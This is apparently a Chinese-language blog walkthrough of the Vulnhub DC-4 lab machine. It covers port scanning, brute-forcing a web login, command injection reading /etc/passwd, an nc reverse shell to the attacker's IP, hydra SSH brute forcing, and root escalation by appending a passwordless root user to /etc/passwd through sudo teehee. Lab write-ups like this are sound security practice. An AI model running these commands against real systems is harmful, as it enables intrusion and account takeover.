Vulnhub靶机DC4渗透测试详解
Vulnhub靶机介绍:
Vulnhub靶机下载:
Vulnhub靶机安装:
Vulnhub靶机漏洞详解:
①:信息收集:
②:暴力破解:
③:提权:
Vulnhub靶机渗透总结:
Vulnhub靶机介绍:
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
从靶机DC4靶机拿到shell 在提权,,,只有拿到root权限才可以发现最终的flag。
Vulnhub靶机下载:
官网地址:http://www.five86.com/downloads/DC-4.zip
Vulnhub靶机安装:
下载好了把安装包解压 然后试用VMware即可。
Vulnhub靶机漏洞详解:
①:信息收集:
kali里使用netdiscover发现主机
渗透机:kali IP :172.16.5.42 靶机IP :172.16.5.30
使用命令:nmap -sS -sV -A -n 172.16.5.30
开启了80和22端口,我们直接访问80端口 dirb 扫了一下没啥 可能就是暴力破解!!
②:暴力破解:
使用一个工具burp设置代理 然后抓个包 输入账号admin密码123456 发送到Intruder模块 设置一个字典 然后 线程设置2000 start attack
这里我们知道知道了密码:happy 成功登入!!
这里应该是个命令执行漏洞,pyload:radio=cat+/etc/passwd&submit=Run 查看用户,发现有三个普通用户:charles、jim、sam
nc -e /bin/bash/ 172.16.5.42 4444
1
使用nc -lvp 4444命令进行反弹,反弹成功 设置python交互 python3 -c "import pty;pty.spawn('/bin/bash')"
信息收集一下 uname -a 进入/home/ 进入/jim/cat test.sh
在backups 中发现了old-passwords.bak
把这个old-passwords.bak里面的复制到kali中然后新建一个字典jim.txt 吧
使用命令:hydra -l jim -P /root/桌面/jim.txt ssh://172.16.5.30
获得密码为:jibril04 登入ssh
登入提示:You have mail 让我们看邮寄 cd/var/mail 发现了jim里面有个Charles密码:^xHhA&hvim0y 尝试切换登入
提示我们使用teehee提权:sudo teehee --help
③:提权:
root权限免密码使用teehee ,teehee 是啥???太菜了不会 ,,,,,,学了半天
大概就是当发现有最追加写入文件功能的时候,直接往 /etc/passwd 里加个root用户
passwd的格式:[⽤户名]:[密码]:[UID]:[GID]:[⾝份描述]:[主⽬录]:[登录shell]
echo "axb::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
1
至此获取到了flag,渗透测试结束。
Vulnhub靶机渗透总结:
这是做的第五个靶场了,学习的知识点和一些细节就是 :
1.需要注意的细节就是bp抓包的时候不要发送到repeater,那个send和Forward不一样 这里卡了很久一直报错,然后没有回弹shell。
2.需要注意的还是python交互那个 容易打错,一定要细心在细心,我前面加了个python3就好
3.把这个old-passwords.bak里面的复制到kali这样才方便爆破 好像下载不了只能复制(我比较菜就只能这样做了)
4.还有个小失误就是 jim里面有个charles用户 我ssh登入的时候 写的是大写的登了半天没进去(气死我了,还是要多细心呀!!)
5.想感慨一下,因为是第一次做 每次都会发现新问题然后去解决 对自己也挺好的 收获也挺多的 多去尝试就好啦!加油!!
新知识点:
①:学习了hydra (九头蛇)工具的使用
②学习了teehee 提权
最后 自己也会把这系列的靶机继续更新,创作不易 希望对大家有所帮助!!